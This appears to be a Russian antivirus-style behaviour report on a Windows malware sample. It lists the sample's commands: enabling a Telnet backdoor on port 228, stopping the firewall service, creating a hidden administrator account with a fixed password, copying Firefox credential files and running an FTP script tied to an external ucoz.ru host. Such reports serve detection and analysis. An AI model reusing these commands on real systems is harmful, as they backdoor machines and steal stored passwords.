Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- <SYSTEM32>\tlntsvr.exe
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\tlntadmn.exe config port=228 sec=-NTLM
- <SYSTEM32>\net1.exe start Telnet
- <SYSTEM32>\net1.exe start sharedaccess
- <SYSTEM32>\alg.exe
- <SYSTEM32>\ipconfig.exe
- <SYSTEM32>\ftp.exe -s:"%WINDIR%\PeerNet\ntmsmgr.dlI"
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- <SYSTEM32>\net.exe STOP sharedaccess
- <SYSTEM32>\net1.exe STOP sharedaccess
- <SYSTEM32>\cmd.exe /c %WINDIR%\peernet\svchost.bat
- <SYSTEM32>\chcp.com 1251
- <SYSTEM32>\net1.exe localgroup %USERNAME%s system32 /add
- <SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v system32 /t REG_DWORD /d 0 /f
- <SYSTEM32>\net1.exe user system32 jenya999 /add
- <SYSTEM32>\net1.exe localgroup Администраторы system32 /add
- %WINDIR%\PeerNet\123\key3.db
- %WINDIR%\PeerNet\file3.txt
- %WINDIR%\system\DriverCard.Dat
- %WINDIR%\PeerNet\ntmsmgr.dlI
- %WINDIR%\PeerNet\123\111.txt
- %WINDIR%\PeerNet\svchost.bat
- %WINDIR%\PeerNet\123\signons.sqlite
- %WINDIR%\PeerNet\file1.txt
- %WINDIR%\PeerNet\sqldb20.dll
- %WINDIR%\PeerNet\ntmsmgr.dlI
- %WINDIR%\PeerNet\sqlse20.dll
- %WINDIR%\PeerNet\sqlqp20.dll
- %WINDIR%\PeerNet\file3.txt
- %WINDIR%\PeerNet\123\key3.db
- %WINDIR%\PeerNet\123\111.txt
- %WINDIR%\PeerNet\file1.txt
- %WINDIR%\PeerNet\123\signons.sqlite
- 'ar###d.ucoz.ru':21
- 'localhost':1035
- DNS ASK ar###d.ucoz.ru
- ClassName: 'Shell_TrayWnd' WindowName: ''